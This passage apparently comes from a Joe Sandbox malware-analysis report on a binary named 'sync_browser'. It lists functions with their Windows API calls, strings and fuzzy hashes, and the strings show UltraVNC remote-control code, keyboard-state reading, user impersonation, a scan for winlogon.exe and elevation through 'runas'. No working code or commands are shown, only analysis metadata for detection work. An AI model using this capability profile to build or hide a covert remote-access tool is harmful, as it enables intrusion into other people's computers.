Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileModuleNameShellfclose
String ID: \uvnckeyboardhelper.exe$p$runas
API String ID: 3322125093-2954907143
Opcode ID: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
Instruction ID: d14ff2b7a4d239374215dc05bf7452e3c3f9abc3c4edd8f817b723d0da69b86f
Opcode Fuzzy Hash: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
Instruction Fuzzy Hash: 7831FC3660CB82C5EB64BB51F4513AAB3A4FB88754F804136DAAD43BA9DF3CE114CB50

Function 00007FF740003E60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56timewindowCOMMON

Download Yara Rule

APIs

SetBkMode.GDI32 ref: 00007FF740003E9C
SetWindowPos.USER32 ref: 00007FF740003ED5
KillTimer.USER32 ref: 00007FF740003EF3
PostQuitMessage.USER32 ref: 00007FF740003EFB
SetTimer.USER32 ref: 00007FF740003F14

Strings

d, xrefs: 00007FF740003EB3

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Timer$KillMessageModePostQuitWindow
String ID: d
API String ID: 3664928928-2564639436
Opcode ID: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
Instruction ID: 5109d452caa032073c9bfcc2f9461892123e9ef2ba2495867ecd4895789442e8
Opcode Fuzzy Hash: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
Instruction Fuzzy Hash: 0E119EA2E1C643C2F7617B35B914675A290AF443A5F884230C92A867F8DF3CF981CA30

Function 00007FF74000A390 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF74000A3A6

Part of subcall function 00007FF74000A200: GetProcAddress.KERNEL32 ref: 00007FF74000A225
Part of subcall function 00007FF74000A200: FreeLibrary.KERNEL32 ref: 00007FF74000A265

LoadLibraryA.KERNEL32 ref: 00007FF74000A3CB
GetProcAddress.KERNEL32 ref: 00007FF74000A3E3
FreeLibrary.KERNEL32 ref: 00007FF74000A407

Strings

shell32.dll, xrefs: 00007FF74000A39F, 00007FF74000A3C0
SHGetSettings, xrefs: 00007FF74000A3D9

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SHGetSettings$shell32.dll
API String ID: 145871493-1819508790
Opcode ID: 77214687e6c2f938150f522afdd75d8ba5a5dca8d0fd701ab14ac9b329bd435a
Instruction ID: f5afa1cdd1ea3194647edca93fb51f98a117478bd5ed8d3655de59bcec921caf
Opcode Fuzzy Hash: 77214687e6c2f938150f522afdd75d8ba5a5dca8d0fd701ab14ac9b329bd435a
Instruction Fuzzy Hash: 13118C21B1D742C2EE50BB65B48817993A0EF8AB80FC81035EA6E43769DE2CF481C720

Function 00007FF740051550 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47keyboardCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32 ref: 00007FF740051561
MapVirtualKeyA.USER32 ref: 00007FF7400515BA
GetAsyncKeyState.USER32 ref: 00007FF7400515D3

Strings

down, xrefs: 00007FF74005158A
vnckeymap.cpp : new state %d (%s), xrefs: 00007FF7400515D9
vnckeymap.cpp : setshiftstate %d - (%s->%s), xrefs: 00007FF740051591

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: AsyncState$Virtual
String ID: down$vnckeymap.cpp : new state %d (%s)$vnckeymap.cpp : setshiftstate %d - (%s->%s)
API String ID: 2891131044-1915745809
Opcode ID: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
Instruction ID: bb4ba1b64dbe5a8cddf66f233708363731fe92195687aee2e3d79af8eb4fcebd
Opcode Fuzzy Hash: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
Instruction Fuzzy Hash: 0211BF62B2CA96C2E612BF14B4001AAE365FB84745F880035E98E477ADDF3CE516C7A0

Function 00007FF7400119A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7400119C6
Process32First.KERNEL32 ref: 00007FF7400119E5
CloseHandle.KERNEL32 ref: 00007FF7400119F2
Process32Next.KERNEL32 ref: 00007FF740011A20
CloseHandle.KERNEL32 ref: 00007FF740011A2D

Strings

winlogon.exe, xrefs: 00007FF740011A00

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
String ID: winlogon.exe
API String ID: 1789362936-961692650
Opcode ID: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
Instruction ID: bd892899c32928db9829b93a53cd512b30a8de5f6d875671d4f5778772a320dd
Opcode Fuzzy Hash: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
Instruction Fuzzy Hash: 4311D03161CA46C5EB24BB25E8543A6A3A0FF88795FC44231D56E467A9EF3CF505C620

Function 00007FF74002C4E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00007FF74002C52A
EnterCriticalSection.KERNEL32 ref: 00007FF74002C551
RevertToSelf.ADVAPI32 ref: 00007FF74002C56C
LeaveCriticalSection.KERNEL32 ref: 00007FF74002C57C

Strings

vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - 1, xrefs: 00007FF74002C515
vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - Impersonationtoken exists, xrefs: 00007FF74002C557

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveRevertSelfTimetime
String ID: vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - Impersonationtoken exists
API String ID: 4293870407-1873781047
Opcode ID: be91d13ce7b9590cac12ce48197b4f720c3c90b62c69517ca8b832bb9a46fa5f
Instruction ID: 9fa26d002bb7cd95b122a92d1615f855970e002cb56ec85a5c0ec86313019eeb
Opcode Fuzzy Hash: be91d13ce7b9590cac12ce48197b4f720c3c90b62c69517ca8b832bb9a46fa5f
Instruction Fuzzy Hash: 83119A90E2CA82C5EB14BB74A4483A8A792AF48B88F880035D60D463A9CF3CF095C760

Function 00007FF740013620 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF74001364B
GetForegroundWindow.USER32 ref: 00007FF74001365C
ShellExecuteExA.SHELL32 ref: 00007FF74001369F

Strings

runas, xrefs: 00007FF740013671
p, xrefs: 00007FF740013653
-rebootforce, xrefs: 00007FF740013693

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -rebootforce$p$runas
API String ID: 3648085421-45594291
Opcode ID: c9e64b892c4310a2a8aa35deb39eabc56664ec1848822a0344db8a204f455f45
Instruction ID: ef64b9794d6c14f19a6cfe3b49c081882b2a3fc3c2cf910271a63d44a9df9f07
Opcode Fuzzy Hash: c9e64b892c4310a2a8aa35deb39eabc56664ec1848822a0344db8a204f455f45
Instruction Fuzzy Hash: 5B01A93561DB85C5E621AF50F49439AB3A4FB89744F900136E6CD02B68DF3CE154CB50

Function 00007FF740009A70 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF740009A99
GetForegroundWindow.USER32 ref: 00007FF740009AA8
ShellExecuteExA.SHELL32 ref: 00007FF740009AF7

Strings

-install, xrefs: 00007FF740009ADA
p, xrefs: 00007FF740009A9F
runas, xrefs: 00007FF740009AB3

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -install$p$runas
API String ID: 3648085421-1683557327
Opcode ID: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
Instruction ID: e589c9c8d222ea914d832eee19543424ebf9a484bcc900c4786748a05ab18d68
Opcode Fuzzy Hash: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
Instruction Fuzzy Hash: 0001DA3561CB81C5E760AF10F49439AB3A4FB89748F900236E6DD02B68DF7DE114CB50

Function 00007FF740009B20 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF740009B49
GetForegroundWindow.USER32 ref: 00007FF740009B58
ShellExecuteExA.SHELL32 ref: 00007FF740009BA7

Strings

p, xrefs: 00007FF740009B4F
runas, xrefs: 00007FF740009B63
-uninstall, xrefs: 00007FF740009B8A

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -uninstall$p$runas
API String ID: 3648085421-3602422011
Opcode ID: 5574e6ddee382544abc3d2c84dae34c608b18e4d42992b9071503c0150b71b53
Instruction ID: db82da42d02cdb4ce1f99226f9ce0abb69900ff27d7ac39074d0b9466a57b5e6
Opcode Fuzzy Hash: 5574e6ddee382544abc3d2c84dae34c608b18e4d42992b9071503c0150b71b53
Instruction Fuzzy Hash: 8701C83561CB81C5E760AB10F49439AB3A4FB89748F900236E6CD02B69DF7DE114CB50

Function 00007FF740009BD0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF740009BF9
GetForegroundWindow.USER32 ref: 00007FF740009C08
ShellExecuteExA.SHELL32 ref: 00007FF740009C57

Strings

runas, xrefs: 00007FF740009C13
p, xrefs: 00007FF740009BFF
-securityeditor, xrefs: 00007FF740009C3A

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -securityeditor$p$runas
API String ID: 3648085421-1380712588
Opcode ID: 6428cee7919a180ae7089cf50127ee33227a6254b4296794cfa51c588de506a2
Instruction ID: 682997e1d8b12b4a4d261f6e54bd852daa8b2607e26f4277ae0617cf9a642d65
Opcode Fuzzy Hash: 6428cee7919a180ae7089cf50127ee33227a6254b4296794cfa51c588de506a2
Instruction Fuzzy Hash: 2001DA3561DB81C5E760AF10F49439AB3A4FB89748F900236E6CD02B68DF7DE114CB50

Function 00007FF74003BA00 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 117COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF74003BA9C
malloc.LIBCMT ref: 00007FF74003BAAC

Strings

vncencoder.cpp : remote palette data requested, xrefs: 00007FF74003BA21
vncencoder.cpp : generating BGR233 palette data, xrefs: 00007FF74003BA79
vncencoder.cpp : generating 8-bit palette data, xrefs: 00007FF74003BB3B
vncencoder.cpp : failed to obtain colour map data!, xrefs: 00007FF74003BB95

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: freemalloc
String ID: vncencoder.cpp : failed to obtain colour map data!$vncencoder.cpp : generating 8-bit palette data$vncencoder.cpp : generating BGR233 palette data$vncencoder.cpp : remote palette data requested
API String ID: 3061335427-2748099863
Opcode ID: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
Instruction ID: 1090b05abc585b8dddef4b78906555dc059832044590066e4ad11e6d8b72a557
Opcode Fuzzy Hash: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
Instruction Fuzzy Hash: 9541D2A2A1C696C2F725BB20A5113B9F7A0EB44748F840032EA4D47BAEDF3CF505C760

Function 00007FF7400142A0 Relevance: 9.1, APIs: 6, Instructions: 101threadwindowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32 ref: 00007FF74001437C

Part of subcall function 00007FF740013EF0: GetModuleFileNameA.KERNEL32 ref: 00007FF740013F18
Part of subcall function 00007FF740013EF0: PlaySoundA.WINMM ref: 00007FF740013F85

CreateThread.KERNEL32 ref: 00007FF740014336
ResumeThread.KERNEL32 ref: 00007FF74001434C

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Thread$CreateFileMessageModuleNamePlayPostResumeSound
String ID:
API String ID: 3945334538-0
Opcode ID: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
Instruction ID: 1be5d58431d7e3c47582b595e7f95ac598a74280491c58b9ab530ecf217c3106
Opcode Fuzzy Hash: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
Instruction Fuzzy Hash: 8041B126A1C941C2EB50BF29F400269A361EBC8B98F854131DE5D077BDDE3CE481C360

Function 00007FF7400BAA6C Relevance: 9.1, APIs: 6, Instructions: 92COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7400BAA99
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400BAAA4
_fileno.LIBCMT ref: 00007FF7400BAAD5
_errno.LIBCMT ref: 00007FF7400BAB45
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400BAB50
_ftbuf.LIBCMT ref: 00007FF7400BAB80

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo$_fileno_ftbuf
String ID:
API String ID: 2434734397-0
Opcode ID: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
Instruction ID: 06bed2f9d12774a5de69ca3f246d0c46c41384fe6696c0d006f232856dbf5054
